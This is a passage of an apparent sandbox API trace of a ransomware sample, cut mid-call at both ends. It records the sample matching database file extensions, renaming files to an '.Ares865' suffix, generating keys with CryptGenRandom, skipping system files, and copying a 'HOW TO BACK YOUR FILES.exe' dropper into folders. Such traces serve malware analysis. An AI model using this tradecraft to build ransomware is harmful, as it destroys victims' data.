[0092.825] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0092.825] lstrlenW (lpString="db-shm") returned 6 [0092.825] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0092.825] lstrlenW (lpString="db-wal") returned 6 [0092.825] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0092.825] lstrlenW (lpString="dbc") returned 3 [0092.825] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0092.825] lstrlenW (lpString="dbs") returned 3 [0092.825] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0092.825] lstrlenW (lpString="dbt") returned 3 [0092.825] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0092.825] lstrlenW (lpString="dbv") returned 3 [0092.825] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0092.825] lstrlenW (lpString="dbx") returned 3 [0092.825] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0092.825] lstrlenW (lpString="dcb") returned 3 [0092.825] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0092.826] lstrlenW (lpString="dct") returned 3 [0092.826] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0092.826] lstrlenW (lpString="dcx") returned 3 [0092.826] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0092.826] lstrlenW (lpString="ddl") returned 3 [0092.826] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0092.826] lstrlenW (lpString="dlis") returned 4 [0092.826] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0092.826] lstrlenW (lpString="dp1") returned 3 [0092.826] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0092.826] lstrlenW (lpString="dqy") returned 3 [0092.826] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0092.826] lstrlenW (lpString="dsk") returned 3 [0092.826] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0092.826] lstrlenW (lpString="dsn") returned 3 [0092.826] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0092.826] lstrlenW (lpString="dtsx") returned 4 [0092.826] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0092.826] lstrlenW (lpString="dxl") returned 3 [0092.826] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0092.826] lstrlenW (lpString="eco") returned 3 [0092.826] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0092.826] lstrlenW (lpString="ecx") returned 3 [0092.826] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0092.826] lstrlenW (lpString="edb") returned 3 [0092.826] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0092.826] lstrlenW (lpString="epim") returned 4 [0092.826] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0092.826] lstrlenW (lpString="fcd") returned 3 [0092.826] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0092.826] lstrlenW (lpString="fdb") returned 3 [0092.826] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0092.826] lstrlenW (lpString="fic") returned 3 [0092.826] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0092.826] lstrlenW (lpString="flexolibrary") returned 12 [0092.826] lstrlenW (lpString="fm5") returned 3 [0092.827] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0092.827] lstrlenW (lpString="fmp") returned 3 [0092.827] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0092.827] lstrlenW (lpString="fmp12") returned 5 [0092.827] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0092.827] lstrlenW (lpString="fmpsl") returned 5 [0092.827] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0092.827] lstrlenW (lpString="fol") returned 3 [0092.827] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0092.827] lstrlenW (lpString="fp3") returned 3 [0092.827] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0092.827] lstrlenW (lpString="fp4") returned 3 [0092.827] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0092.827] lstrlenW (lpString="fp5") returned 3 [0092.827] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0092.827] lstrlenW (lpString="fp7") returned 3 [0092.827] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0092.827] lstrlenW (lpString="fpt") returned 3 [0092.827] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0092.827] lstrlenW (lpString="frm") returned 3 [0092.827] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0092.827] lstrlenW (lpString="gdb") returned 3 [0092.827] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0092.827] lstrlenW (lpString="gdb") returned 3 [0092.827] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0092.827] lstrlenW (lpString="grdb") returned 4 [0092.827] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0092.827] lstrlenW (lpString="gwi") returned 3 [0092.827] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0092.827] lstrlenW (lpString="hdb") returned 3 [0092.827] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0092.827] lstrlenW (lpString="his") returned 3 [0092.827] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0092.827] lstrlenW (lpString="ib") returned 2 [0092.827] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0092.827] lstrlenW (lpString="idb") returned 3 [0092.827] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0092.828] lstrlenW (lpString="ihx") returned 3 [0092.828] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0092.828] lstrlenW (lpString="itdb") returned 4 [0092.828] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0092.828] lstrlenW (lpString="itw") returned 3 [0092.828] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0092.828] lstrlenW (lpString="jet") returned 3 [0092.828] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0092.828] lstrlenW (lpString="jtx") returned 3 [0092.828] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0092.828] lstrlenW (lpString="kdb") returned 3 [0092.828] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0092.828] lstrlenW (lpString="kexi") returned 4 [0092.828] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0092.828] lstrlenW (lpString="kexic") returned 5 [0092.828] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0092.828] lstrlenW (lpString="kexis") returned 5 [0092.828] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0092.828] lstrlenW (lpString="lgc") returned 3 [0092.828] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0092.828] lstrlenW (lpString="lwx") returned 3 [0092.828] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0092.828] lstrlenW (lpString="maf") returned 3 [0092.828] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0092.828] lstrlenW (lpString="maq") returned 3 [0092.828] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0092.828] lstrlenW (lpString="mar") returned 3 [0092.828] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0092.828] lstrlenW (lpString="marshal") returned 7 [0092.828] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0092.828] lstrlenW (lpString="mas") returned 3 [0092.828] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0092.828] lstrlenW (lpString="mav") returned 3 [0092.828] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0092.828] lstrlenW (lpString="maw") returned 3 [0092.828] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0092.829] lstrlenW (lpString="mdbhtml") returned 7 [0092.829] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0092.829] lstrlenW (lpString="mdn") returned 3 [0092.829] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0092.829] lstrlenW (lpString="mdt") returned 3 [0092.829] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0092.829] lstrlenW (lpString="mfd") returned 3 [0092.829] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0092.829] lstrlenW (lpString="mpd") returned 3 [0092.829] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0092.829] lstrlenW (lpString="mrg") returned 3 [0092.829] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0092.829] lstrlenW (lpString="mud") returned 3 [0092.829] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0092.829] lstrlenW (lpString="mwb") returned 3 [0092.829] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0092.829] lstrlenW (lpString="myd") returned 3 [0092.829] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0092.829] lstrlenW (lpString="ndf") returned 3 [0092.829] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0092.829] lstrlenW (lpString="nnt") returned 3 [0092.829] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0092.829] lstrlenW (lpString="nrmlib") returned 6 [0092.829] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0092.829] lstrlenW (lpString="ns2") returned 3 [0092.829] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0092.829] lstrlenW (lpString="ns3") returned 3 [0092.829] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0092.829] lstrlenW (lpString="ns4") returned 3 [0092.829] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0092.829] lstrlenW (lpString="nsf") returned 3 [0092.829] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0092.829] lstrlenW (lpString="nv") returned 2 [0092.829] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0092.829] lstrlenW (lpString="nv2") returned 3 [0092.829] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0092.830] lstrlenW (lpString="nwdb") returned 4 [0092.830] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0092.830] lstrlenW (lpString="nyf") returned 3 [0092.830] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0092.830] lstrlenW (lpString="odb") returned 3 [0092.830] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0092.830] lstrlenW (lpString="odb") returned 3 [0092.830] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0092.830] lstrlenW (lpString="oqy") returned 3 [0092.830] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0092.830] lstrlenW (lpString="ora") returned 3 [0092.830] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0092.830] lstrlenW (lpString="orx") returned 3 [0092.830] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0092.830] lstrlenW (lpString="owc") returned 3 [0092.830] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0092.830] lstrlenW (lpString="p96") returned 3 [0092.830] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0092.830] lstrlenW (lpString="p97") returned 3 [0092.830] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0092.830] lstrlenW (lpString="pan") returned 3 [0092.830] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0092.830] lstrlenW (lpString="pdb") returned 3 [0092.830] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0092.830] lstrlenW (lpString="pdm") returned 3 [0092.830] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0092.830] lstrlenW (lpString="pnz") returned 3 [0092.830] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0092.830] lstrlenW (lpString="qry") returned 3 [0092.830] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0092.830] lstrlenW (lpString="qvd") returned 3 [0092.830] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0092.830] lstrlenW (lpString="rbf") returned 3 [0092.830] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0092.830] lstrlenW (lpString="rctd") returned 4 [0092.830] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0092.831] lstrlenW (lpString="rod") returned 3 [0092.831] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0092.831] lstrlenW (lpString="rodx") returned 4 [0092.831] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0092.831] lstrlenW (lpString="rpd") returned 3 [0092.831] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0092.831] lstrlenW (lpString="rsd") returned 3 [0092.831] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0092.831] lstrlenW (lpString="sas7bdat") returned 8 [0092.831] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0092.831] lstrlenW (lpString="sbf") returned 3 [0092.831] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0092.831] lstrlenW (lpString="scx") returned 3 [0092.831] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0092.831] lstrlenW (lpString="sdb") returned 3 [0092.831] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0092.831] lstrlenW (lpString="sdc") returned 3 [0092.831] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0092.831] lstrlenW (lpString="sdf") returned 3 [0092.831] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0092.831] lstrlenW (lpString="sis") returned 3 [0092.831] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0092.831] lstrlenW (lpString="spq") returned 3 [0092.831] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0092.831] lstrlenW (lpString="te") returned 2 [0092.831] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0092.831] lstrlenW (lpString="teacher") returned 7 [0092.831] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0092.832] lstrlenW (lpString="tmd") returned 3 [0092.832] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0092.832] lstrlenW (lpString="tps") returned 3 [0092.832] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0092.832] lstrlenW (lpString="trc") returned 3 [0092.832] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0092.832] lstrlenW (lpString="trc") returned 3 [0092.832] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0092.832] lstrlenW (lpString="trm") returned 3 [0092.832] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0092.832] lstrlenW (lpString="udb") returned 3 [0092.832] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0092.832] lstrlenW (lpString="udl") returned 3 [0092.832] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0092.832] lstrlenW (lpString="usr") returned 3 [0092.832] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0092.832] lstrlenW (lpString="v12") returned 3 [0092.832] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0092.832] lstrlenW (lpString="vis") returned 3 [0092.832] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0092.832] lstrlenW (lpString="vpd") returned 3 [0092.832] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0092.832] lstrlenW (lpString="vvv") returned 3 [0092.832] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0092.832] lstrlenW (lpString="wdb") returned 3 [0092.832] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0092.832] lstrlenW (lpString="wmdb") returned 4 [0092.832] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0092.832] lstrlenW (lpString="wrk") returned 3 [0092.832] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0092.832] lstrlenW (lpString="xdb") returned 3 [0092.832] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0092.832] lstrlenW (lpString="xld") returned 3 [0092.832] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0092.832] lstrlenW (lpString="xmlff") returned 5 [0092.832] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0092.832] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini.Ares865") returned 61 [0092.833] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\desktop.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0092.833] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0092.833] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=282) returned 1 [0092.833] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0092.834] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0092.834] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0092.834] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0092.834] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0092.834] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.835] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x420, lpName=0x0) returned 0x15c [0092.836] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x420) returned 0x190000 [0092.836] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0092.836] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0092.836] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.837] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0092.837] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0092.837] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0092.837] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0092.837] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0092.837] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0092.837] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0092.837] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0092.837] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0092.837] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0092.837] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0092.837] CloseHandle (hObject=0x15c) returned 1 [0092.837] CloseHandle (hObject=0x118) returned 1 [0092.838] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0092.838] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0092.838] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0092.838] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d138020, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4d138020, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0092.838] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0092.839] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d138020, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4d138020, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0092.839] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0092.839] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7810 [0092.839] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent" [0092.839] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2edbb8 | out: hHeap=0x2b0000) returned 1 [0092.839] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7808 | out: hHeap=0x2b0000) returned 1 [0092.839] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent") returned 36 [0092.839] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent" [0092.839] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0092.839] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\how to back your files.exe"), bFailIfExists=1) returned 0 [0092.839] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0092.840] GetLastError () returned 0x0 [0092.840] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0092.840] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0092.840] CloseHandle (hObject=0x120) returned 1 [0092.840] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0092.840] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0092.840] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d138020, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d138020, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0092.840] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.840] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0092.840] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0092.840] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d138020, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d138020, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0092.840] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.840] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0092.840] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0092.840] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0092.840] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d36d4e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x3dadd9a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x3dadd9a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x19a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-nkAbxRjWZdB18q.lnk", cAlternateFileName="-NKABX~1.LNK")) returned 1 [0092.841] lstrcmpiW (lpString1="-nkAbxRjWZdB18q.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0092.841] lstrcmpiW (lpString1="-nkAbxRjWZdB18q.lnk", lpString2="aoldtz.exe") returned 1 [0092.841] lstrcmpiW (lpString1="-nkAbxRjWZdB18q.lnk", lpString2=".") returned 1 [0092.841] lstrcmpiW (lpString1="-nkAbxRjWZdB18q.lnk", lpString2="..") returned 1 [0092.841] lstrcmpiW (lpString1="-nkAbxRjWZdB18q.lnk", lpString2="windows") returned -1 [0092.841] lstrcmpiW (lpString1="-nkAbxRjWZdB18q.lnk", lpString2="bootmgr") returned 1 [0092.841] lstrcmpiW (lpString1="-nkAbxRjWZdB18q.lnk", lpString2="temp") returned -1 [0092.841] lstrcmpiW (lpString1="-nkAbxRjWZdB18q.lnk", lpString2="pagefile.sys") returned -1 [0092.841] lstrcmpiW (lpString1="-nkAbxRjWZdB18q.lnk", lpString2="boot") returned 1 [0092.841] lstrcmpiW (lpString1="-nkAbxRjWZdB18q.lnk", lpString2="ids.txt") returned 1 [0092.841] lstrcmpiW (lpString1="-nkAbxRjWZdB18q.lnk", lpString2="ntuser.dat") returned -1 [0092.841] lstrcmpiW (lpString1="-nkAbxRjWZdB18q.lnk", lpString2="perflogs") returned -1 [0092.841] lstrcmpiW (lpString1="-nkAbxRjWZdB18q.lnk", lpString2="MSBuild") returned 1 [0092.841] lstrlenW (lpString="-nkAbxRjWZdB18q.lnk") returned 19 [0092.841] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*") returned 38 [0092.841] lstrcpyW (in: lpString1=0x2cce44a, lpString2="-nkAbxRjWZdB18q.lnk" | out: lpString1="-nkAbxRjWZdB18q.lnk") returned="-nkAbxRjWZdB18q.lnk" [0092.841] lstrlenW (lpString="-nkAbxRjWZdB18q.lnk") 